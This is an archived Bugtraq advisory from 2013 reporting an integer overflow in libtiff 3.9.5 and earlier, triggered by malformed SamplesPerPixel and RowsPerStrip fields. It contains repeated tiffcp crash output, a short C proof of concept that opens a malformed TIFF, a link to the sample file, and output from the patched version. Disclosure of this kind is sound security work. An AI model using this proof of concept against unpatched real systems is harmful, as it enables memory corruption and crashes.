lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 24 Aug 2013 10:35:10 GMT From: geinblues@...il.com To: bugtraq@...urityfocus.com Subject: libtiff <= 3.9.5 integer overflow bug +----------------------------------------------------+ | XADV-2013001 libtiff <= 3.9.5 integer overflow bug | +----------------------------------------------------+ vulnerable versions: - libtiff 3.9.5 <= - libtiff 3.6.0 not vulnerable versions: - libtiff 4.0.3 - libtiff 4.0.2 - libtiff 4.0.1 - libtiff 4.0.0 release path: 4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched) -> 3.9.5(vulnerable) testbed: linux distro type: local impact: medium vendor: http://www.remotesensing.org/libtiff author: x90c site: x90c.org email: geinblues@...il.com ========== abstract: ========== I discovered libtiff TIFFOpen integer overflow bug by weird TIFFOpen call success with malformed tif image file! - tiffcp tool (tiffinfo, tiff2ps, ... also can test): Many times tiffcp execution ... often, it entered to tiffcp function in tiffcp tool after tiffopen. Often calling openSrcImage success. malformed tif image within count of SamplePerPixel or RowsPerStrip can be opened by TIFFOpen even though can't tiffcp, TIFFWrite Directory with the returned TIFF* - integer overflow to heap corruption: Malformed tif image file within SamplePerPixel and RowsPerStrip can be opened the malformed tif data. and can be calculated in other library functions it leads to integer overflow to memory corruption! - exploitation: Exploit tries many times to call TIFFOpen with malformed tif file. sometimes after, the target program used vulnerable libtiff can be corrupted if these two field will passed validation checks ========= details: ========= tiff-v3.6.0/tools/tiffcp Many times TIFFOpen calls ---- .. [root@...tos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif [root@...tos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@...tos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@...tos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize. TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size. [root@...tos5 tools]# ./tiffcp -b $SAMPLE samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output Bias image must be monochrome [root@...tos5 tools]# ---- As you see, malformed td_samplesperpixel(sampleperpixel field of tif image) count of 2 changes these values 1,0 to a value of sample= of 1392(0x570). the invalid value can be calculated and integer overflow! =============== exploit codes: =============== tiff_poc.c -- #include <stdio.h> #include <stdlib.h> #include <string.h> #include "tiffio.h" int tiff_integer_overflow_test(){ TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r"); int samples = 0; /* * for instance, TIFFGetField library function will * called with malicious samplesperpixel field value * TIFFGetField got segfault! */ TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples); printf("tiff_poc: tif samplesperpixel field=%d\n", samples); } -- - I attached the sample_spp.tif: http://www.x90c.org/exploits/sample_spp.tif ============= patch codes: ============= tiff-4.0.3/tools/tiffcp (latest version) ---- TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# ./tiffcp $SAMPLE tc1.tif TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel". [root@...tos5 tools]# .... .. ... .. ---- safe! ============== vendor status: ============== 2013/08/24 - I discovered the security bug 2013/08/24 - the advisory released
Powered by blists - more mailing lists